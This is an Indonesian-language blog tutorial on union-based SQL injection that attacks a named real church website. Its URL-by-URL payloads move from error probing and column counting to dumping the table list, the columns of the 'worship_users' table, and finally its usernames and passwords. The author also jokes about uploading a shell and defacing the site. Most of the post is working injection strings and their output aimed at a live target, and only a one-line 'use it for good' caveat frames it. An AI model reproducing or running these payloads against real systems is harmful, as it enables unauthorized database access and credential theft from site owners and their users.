Easy SQL Injection Tricks
Karena di paksa posting ama rikimaru90....
aku posting ni aja deh,,,
Nie tutorial SQLi....
langsung aja ya,,, gag perlu basa-basi....
let's try...
Target: http://www.jkimiraclecenter.com/artikel.php?artikelid=56
Untuk mengetahui web itu vuln ato gag... kasih aja tanda ' setelah angka idnya....
http://www.jkimiraclecenter.com/artikel.php?artikelid=56' << error
error: Warning: mysql_fetch_assoc(): supplied argument is not a valid MySQL result resource in /home/content/r/g/m/rgministry/html/JKI3/artikel.php on line 22 (errornya beda-beda lho....)
langkah selanjutnya... nyari jumlah kolom...
http://www.jkimiraclecenter.com/artikel.php?artikelid=56 order by 1 << bisa
http://www.jkimiraclecenter.com/artikel.php?artikelid=56 order by 2 << bisa
http://www.jkimiraclecenter.com/artikel.php?artikelid=56 order by 3 << bisa
http://www.jkimiraclecenter.com/artikel.php?artikelid=56 order by 4 << bisa
http://www.jkimiraclecenter.com/artikel.php?artikelid=56 order by 5 << bisa
http://www.jkimiraclecenter.com/artikel.php?artikelid=56 order by 6 << bisa
http://www.jkimiraclecenter.com/artikel.php?artikelid=56 order by 7 << bisa
http://www.jkimiraclecenter.com/artikel.php?artikelid=56 order by 8 << bisa
http://www.jkimiraclecenter.com/artikel.php?artikelid=56 order by 9 << bisa
http://www.jkimiraclecenter.com/artikel.php?artikelid=56 order by 10 << error...
pokoknya coba terus sampe error... web itu error pada "order by 10" berarti jumlah kolomnya ada 9 (terakhir normal)
trus selanjutnya... nyari angka ajaib,,,,,
http://www.jkimiraclecenter.com/artikel.php?artikelid=null union select 1,2,3,4,5,6,7,8,9
angkanya di ganti null aja.... << mengacaukan akses database
union select 1,2,..... sampai jumlah kolomnya....
Tuh muncul angka ajaibnya,,, 2,7,3
langkah selanjutnya.... nyari table" di database...
http://www.jkimiraclecenter.com/artikel.php?artikelid=null union select 1,2,group_concat(table_name),4,5,6,7,8,9 from information_schema.tables where table_schema=database()
tuh,,, munculkan tabel"nya...
artikel,chordfiles,devotion,devotion1011,doyouknow,renungan,short_teaching,songs,songs_video,video,video_view_log,web_registration,word_of_wisdom,worship_users
selanjutnya... kita intip kolom"nya yang ada di table = worship_users
http://www.jkimiraclecenter.com/artikel.php?artikelid=null union select 1,2,group_concat(column_name),4,5,6,7,8,9 from information_schema.columns where table_name=0x776f72736869705f7573657273
776f72736869705f7573657273 << hexa dari worship_users
muncul deh kolom" di tabel worship_users
worship_userid,full_name,username,password,level,email,notify_song,notify_chord,notify_lyric
next.. kita intip username & password... :D
http://www.jkimiraclecenter.com/artikel.php?artikelid=null union select 1,2,group_concat(username,0x7c,password),4,5,6,7,8,9 from worship_users
Tuh kan Keluar username & passwordnya.....
hehehhehehe
Terserah deh mau ngpain....
[kalo aku sih... cari tempat upload, upload shell, edit" sesuka hati...wkwkwkwkwk ya gag lah...]
Gunakan ilmumu utk kebaikan ya...
Posted by JaDo3L
No comments: